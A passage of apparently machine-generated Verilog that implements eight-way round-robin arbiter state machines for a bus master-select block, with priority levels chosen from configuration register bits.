                            end
                            else
                            begin 
                                if ( s0_msel_arb0_req[7] ) 
                                begin
                                    s0_msel_arb0_next_state = s0_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb0_req[0] ) 
                                    begin
                                        s0_msel_arb0_next_state = s0_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb0_req[1] ) 
                                        begin
                                            s0_msel_arb0_next_state = s0_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb0_grant3:
        begin
            if (  !( s0_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s0_msel_arb0_req[4] ) 
                begin
                    s0_msel_arb0_next_state = s0_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s0_msel_arb0_req[5] ) 
                    begin
                        s0_msel_arb0_next_state = s0_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s0_msel_arb0_req[6] ) 
                        begin
                            s0_msel_arb0_next_state = s0_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s0_msel_arb0_req[7] ) 
                            begin
                                s0_msel_arb0_next_state = s0_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s0_msel_arb0_req[0] ) 
                                begin
                                    s0_msel_arb0_next_state = s0_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb0_req[1] ) 
                                    begin
                                        s0_msel_arb0_next_state = s0_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb0_req[2] ) 
                                        begin
                                            s0_msel_arb0_next_state = s0_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb0_grant4:
        begin
            if (  !( s0_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s0_msel_arb0_req[5] ) 
                begin
                    s0_msel_arb0_next_state = s0_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s0_msel_arb0_req[6] ) 
                    begin
                        s0_msel_arb0_next_state = s0_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s0_msel_arb0_req[7] ) 
                        begin
                            s0_msel_arb0_next_state = s0_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s0_msel_arb0_req[0] ) 
                            begin
                                s0_msel_arb0_next_state = s0_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s0_msel_arb0_req[1] ) 
                                begin
                                    s0_msel_arb0_next_state = s0_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb0_req[2] ) 
                                    begin
                                        s0_msel_arb0_next_state = s0_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb0_req[3] ) 
                                        begin
                                            s0_msel_arb0_next_state = s0_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb0_grant5:
        begin
            if (  !( s0_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s0_msel_arb0_req[6] ) 
                begin
                    s0_msel_arb0_next_state = s0_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s0_msel_arb0_req[7] ) 
                    begin
                        s0_msel_arb0_next_state = s0_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s0_msel_arb0_req[0] ) 
                        begin
                            s0_msel_arb0_next_state = s0_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s0_msel_arb0_req[1] ) 
                            begin
                                s0_msel_arb0_next_state = s0_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s0_msel_arb0_req[2] ) 
                                begin
                                    s0_msel_arb0_next_state = s0_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb0_req[3] ) 
                                    begin
                                        s0_msel_arb0_next_state = s0_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb0_req[4] ) 
                                        begin
                                            s0_msel_arb0_next_state = s0_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb0_grant6:
        begin
            if (  !( s0_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s0_msel_arb0_req[7] ) 
                begin
                    s0_msel_arb0_next_state = s0_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s0_msel_arb0_req[0] ) 
                    begin
                        s0_msel_arb0_next_state = s0_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s0_msel_arb0_req[1] ) 
                        begin
                            s0_msel_arb0_next_state = s0_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s0_msel_arb0_req[2] ) 
                            begin
                                s0_msel_arb0_next_state = s0_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s0_msel_arb0_req[3] ) 
                                begin
                                    s0_msel_arb0_next_state = s0_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb0_req[4] ) 
                                    begin
                                        s0_msel_arb0_next_state = s0_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb0_req[5] ) 
                                        begin
                                            s0_msel_arb0_next_state = s0_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb0_grant7:
        begin
            if (  !( s0_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s0_msel_arb0_req[0] ) 
                begin
                    s0_msel_arb0_next_state = s0_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s0_msel_arb0_req[1] ) 
                    begin
                        s0_msel_arb0_next_state = s0_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s0_msel_arb0_req[2] ) 
                        begin
                            s0_msel_arb0_next_state = s0_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s0_msel_arb0_req[3] ) 
                            begin
                                s0_msel_arb0_next_state = s0_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s0_msel_arb0_req[4] ) 
                                begin
                                    s0_msel_arb0_next_state = s0_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb0_req[5] ) 
                                    begin
                                        s0_msel_arb0_next_state = s0_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb0_req[6] ) 
                                        begin
                                            s0_msel_arb0_next_state = s0_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s0_msel_arb1_req = { ( s0_msel_req[7] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[15] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[14] ) ) } == 2'd1 ) ), ( s0_msel_req[6] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[13] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[12] ) ) } == 2'd1 ) ), ( s0_msel_req[5] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[11] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[10] ) ) } == 2'd1 ) ), ( s0_msel_req[4] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[9] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[8] ) ) } == 2'd1 ) ), ( s0_msel_req[3] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[7] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[6] ) ) } == 2'd1 ) ), ( s0_msel_req[2] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[5] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[4] ) ) } == 2'd1 ) ), ( s0_msel_req[1] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[3] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[2] ) ) } == 2'd1 ) ), ( s0_msel_req[0] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[1] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s0_msel_arb1_state <= s0_msel_arb1_grant0;
        end
        else
        begin 
            s0_msel_arb1_state <= s0_msel_arb1_next_state;
        end
    end
    always @ (  s0_msel_arb1_state or  { ( s0_msel_req[7] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[15] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[14] ) ) } == 2'd1 ) ), ( s0_msel_req[6] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[13] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[12] ) ) } == 2'd1 ) ), ( s0_msel_req[5] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[11] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[10] ) ) } == 2'd1 ) ), ( s0_msel_req[4] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[9] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[8] ) ) } == 2'd1 ) ), ( s0_msel_req[3] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[7] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[6] ) ) } == 2'd1 ) ), ( s0_msel_req[2] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[5] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[4] ) ) } == 2'd1 ) ), ( s0_msel_req[1] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[3] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[2] ) ) } == 2'd1 ) ), ( s0_msel_req[0] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[1] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s0_msel_arb1_next_state = s0_msel_arb1_state;
        case ( s0_msel_arb1_state ) 
        s0_msel_arb1_grant0:
        begin
            if (  !( s0_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s0_msel_arb1_req[1] ) 
                begin
                    s0_msel_arb1_next_state = s0_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s0_msel_arb1_req[2] ) 
                    begin
                        s0_msel_arb1_next_state = s0_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s0_msel_arb1_req[3] ) 
                        begin
                            s0_msel_arb1_next_state = s0_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s0_msel_arb1_req[4] ) 
                            begin
                                s0_msel_arb1_next_state = s0_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s0_msel_arb1_req[5] ) 
                                begin
                                    s0_msel_arb1_next_state = s0_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb1_req[6] ) 
                                    begin
                                        s0_msel_arb1_next_state = s0_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb1_req[7] ) 
                                        begin
                                            s0_msel_arb1_next_state = s0_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb1_grant1:
        begin
            if (  !( s0_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s0_msel_arb1_req[2] ) 
                begin
                    s0_msel_arb1_next_state = s0_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s0_msel_arb1_req[3] ) 
                    begin
                        s0_msel_arb1_next_state = s0_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s0_msel_arb1_req[4] ) 
                        begin
                            s0_msel_arb1_next_state = s0_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s0_msel_arb1_req[5] ) 
                            begin
                                s0_msel_arb1_next_state = s0_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s0_msel_arb1_req[6] ) 
                                begin
                                    s0_msel_arb1_next_state = s0_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb1_req[7] ) 
                                    begin
                                        s0_msel_arb1_next_state = s0_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb1_req[0] ) 
                                        begin
                                            s0_msel_arb1_next_state = s0_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb1_grant2:
        begin
            if (  !( s0_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s0_msel_arb1_req[3] ) 
                begin
                    s0_msel_arb1_next_state = s0_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s0_msel_arb1_req[4] ) 
                    begin
                        s0_msel_arb1_next_state = s0_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s0_msel_arb1_req[5] ) 
                        begin
                            s0_msel_arb1_next_state = s0_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s0_msel_arb1_req[6] ) 
                            begin
                                s0_msel_arb1_next_state = s0_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s0_msel_arb1_req[7] ) 
                                begin
                                    s0_msel_arb1_next_state = s0_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb1_req[0] ) 
                                    begin
                                        s0_msel_arb1_next_state = s0_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb1_req[1] ) 
                                        begin
                                            s0_msel_arb1_next_state = s0_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb1_grant3:
        begin
            if (  !( s0_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s0_msel_arb1_req[4] ) 
                begin
                    s0_msel_arb1_next_state = s0_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s0_msel_arb1_req[5] ) 
                    begin
                        s0_msel_arb1_next_state = s0_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s0_msel_arb1_req[6] ) 
                        begin
                            s0_msel_arb1_next_state = s0_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s0_msel_arb1_req[7] ) 
                            begin
                                s0_msel_arb1_next_state = s0_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s0_msel_arb1_req[0] ) 
                                begin
                                    s0_msel_arb1_next_state = s0_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb1_req[1] ) 
                                    begin
                                        s0_msel_arb1_next_state = s0_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb1_req[2] ) 
                                        begin
                                            s0_msel_arb1_next_state = s0_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb1_grant4:
        begin
            if (  !( s0_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s0_msel_arb1_req[5] ) 
                begin
                    s0_msel_arb1_next_state = s0_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s0_msel_arb1_req[6] ) 
                    begin
                        s0_msel_arb1_next_state = s0_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s0_msel_arb1_req[7] ) 
                        begin
                            s0_msel_arb1_next_state = s0_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s0_msel_arb1_req[0] ) 
                            begin
                                s0_msel_arb1_next_state = s0_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s0_msel_arb1_req[1] ) 
                                begin
                                    s0_msel_arb1_next_state = s0_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb1_req[2] ) 
                                    begin
                                        s0_msel_arb1_next_state = s0_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb1_req[3] ) 
                                        begin
                                            s0_msel_arb1_next_state = s0_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb1_grant5:
        begin
            if (  !( s0_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s0_msel_arb1_req[6] ) 
                begin
                    s0_msel_arb1_next_state = s0_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s0_msel_arb1_req[7] ) 
                    begin
                        s0_msel_arb1_next_state = s0_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s0_msel_arb1_req[0] ) 
                        begin
                            s0_msel_arb1_next_state = s0_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s0_msel_arb1_req[1] ) 
                            begin
                                s0_msel_arb1_next_state = s0_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s0_msel_arb1_req[2] ) 
                                begin
                                    s0_msel_arb1_next_state = s0_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb1_req[3] ) 
                                    begin
                                        s0_msel_arb1_next_state = s0_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb1_req[4] ) 
                                        begin
                                            s0_msel_arb1_next_state = s0_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb1_grant6:
        begin
            if (  !( s0_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s0_msel_arb1_req[7] ) 
                begin
                    s0_msel_arb1_next_state = s0_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s0_msel_arb1_req[0] ) 
                    begin
                        s0_msel_arb1_next_state = s0_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s0_msel_arb1_req[1] ) 
                        begin
                            s0_msel_arb1_next_state = s0_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s0_msel_arb1_req[2] ) 
                            begin
                                s0_msel_arb1_next_state = s0_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s0_msel_arb1_req[3] ) 
                                begin
                                    s0_msel_arb1_next_state = s0_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb1_req[4] ) 
                                    begin
                                        s0_msel_arb1_next_state = s0_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb1_req[5] ) 
                                        begin
                                            s0_msel_arb1_next_state = s0_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb1_grant7:
        begin
            if (  !( s0_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s0_msel_arb1_req[0] ) 
                begin
                    s0_msel_arb1_next_state = s0_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s0_msel_arb1_req[1] ) 
                    begin
                        s0_msel_arb1_next_state = s0_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s0_msel_arb1_req[2] ) 
                        begin
                            s0_msel_arb1_next_state = s0_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s0_msel_arb1_req[3] ) 
                            begin
                                s0_msel_arb1_next_state = s0_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s0_msel_arb1_req[4] ) 
                                begin
                                    s0_msel_arb1_next_state = s0_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb1_req[5] ) 
                                    begin
                                        s0_msel_arb1_next_state = s0_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb1_req[6] ) 
                                        begin
                                            s0_msel_arb1_next_state = s0_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s0_msel_arb2_req = { ( s0_msel_req[7] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[15] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[14] ) ) } == 2'd2 ) ), ( s0_msel_req[6] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[13] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[12] ) ) } == 2'd2 ) ), ( s0_msel_req[5] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[11] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[10] ) ) } == 2'd2 ) ), ( s0_msel_req[4] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[9] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[8] ) ) } == 2'd2 ) ), ( s0_msel_req[3] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[7] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[6] ) ) } == 2'd2 ) ), ( s0_msel_req[2] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[5] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[4] ) ) } == 2'd2 ) ), ( s0_msel_req[1] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[3] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[2] ) ) } == 2'd2 ) ), ( s0_msel_req[0] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[1] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s0_msel_arb2_state <= s0_msel_arb2_grant0;
        end
        else
        begin 
            s0_msel_arb2_state <= s0_msel_arb2_next_state;
        end
    end
    always @ (  s0_msel_arb2_state or  { ( s0_msel_req[7] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[15] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[14] ) ) } == 2'd2 ) ), ( s0_msel_req[6] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[13] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[12] ) ) } == 2'd2 ) ), ( s0_msel_req[5] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[11] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[10] ) ) } == 2'd2 ) ), ( s0_msel_req[4] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[9] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[8] ) ) } == 2'd2 ) ), ( s0_msel_req[3] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[7] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[6] ) ) } == 2'd2 ) ), ( s0_msel_req[2] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[5] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[4] ) ) } == 2'd2 ) ), ( s0_msel_req[1] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[3] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[2] ) ) } == 2'd2 ) ), ( s0_msel_req[0] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[1] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s0_msel_arb2_next_state = s0_msel_arb2_state;
        case ( s0_msel_arb2_state ) 
        s0_msel_arb2_grant0:
        begin
            if (  !( s0_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s0_msel_arb2_req[1] ) 
                begin
                    s0_msel_arb2_next_state = s0_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s0_msel_arb2_req[2] ) 
                    begin
                        s0_msel_arb2_next_state = s0_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s0_msel_arb2_req[3] ) 
                        begin
                            s0_msel_arb2_next_state = s0_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s0_msel_arb2_req[4] ) 
                            begin
                                s0_msel_arb2_next_state = s0_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s0_msel_arb2_req[5] ) 
                                begin
                                    s0_msel_arb2_next_state = s0_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb2_req[6] ) 
                                    begin
                                        s0_msel_arb2_next_state = s0_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb2_req[7] ) 
                                        begin
                                            s0_msel_arb2_next_state = s0_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb2_grant1:
        begin
            if (  !( s0_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s0_msel_arb2_req[2] ) 
                begin
                    s0_msel_arb2_next_state = s0_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s0_msel_arb2_req[3] ) 
                    begin
                        s0_msel_arb2_next_state = s0_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s0_msel_arb2_req[4] ) 
                        begin
                            s0_msel_arb2_next_state = s0_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s0_msel_arb2_req[5] ) 
                            begin
                                s0_msel_arb2_next_state = s0_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s0_msel_arb2_req[6] ) 
                                begin
                                    s0_msel_arb2_next_state = s0_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb2_req[7] ) 
                                    begin
                                        s0_msel_arb2_next_state = s0_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb2_req[0] ) 
                                        begin
                                            s0_msel_arb2_next_state = s0_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb2_grant2:
        begin
            if (  !( s0_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s0_msel_arb2_req[3] ) 
                begin
                    s0_msel_arb2_next_state = s0_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s0_msel_arb2_req[4] ) 
                    begin
                        s0_msel_arb2_next_state = s0_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s0_msel_arb2_req[5] ) 
                        begin
                            s0_msel_arb2_next_state = s0_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s0_msel_arb2_req[6] ) 
                            begin
                                s0_msel_arb2_next_state = s0_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s0_msel_arb2_req[7] ) 
                                begin
                                    s0_msel_arb2_next_state = s0_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb2_req[0] ) 
                                    begin
                                        s0_msel_arb2_next_state = s0_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb2_req[1] ) 
                                        begin
                                            s0_msel_arb2_next_state = s0_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb2_grant3:
        begin
            if (  !( s0_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s0_msel_arb2_req[4] ) 
                begin
                    s0_msel_arb2_next_state = s0_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s0_msel_arb2_req[5] ) 
                    begin
                        s0_msel_arb2_next_state = s0_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s0_msel_arb2_req[6] ) 
                        begin
                            s0_msel_arb2_next_state = s0_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s0_msel_arb2_req[7] ) 
                            begin
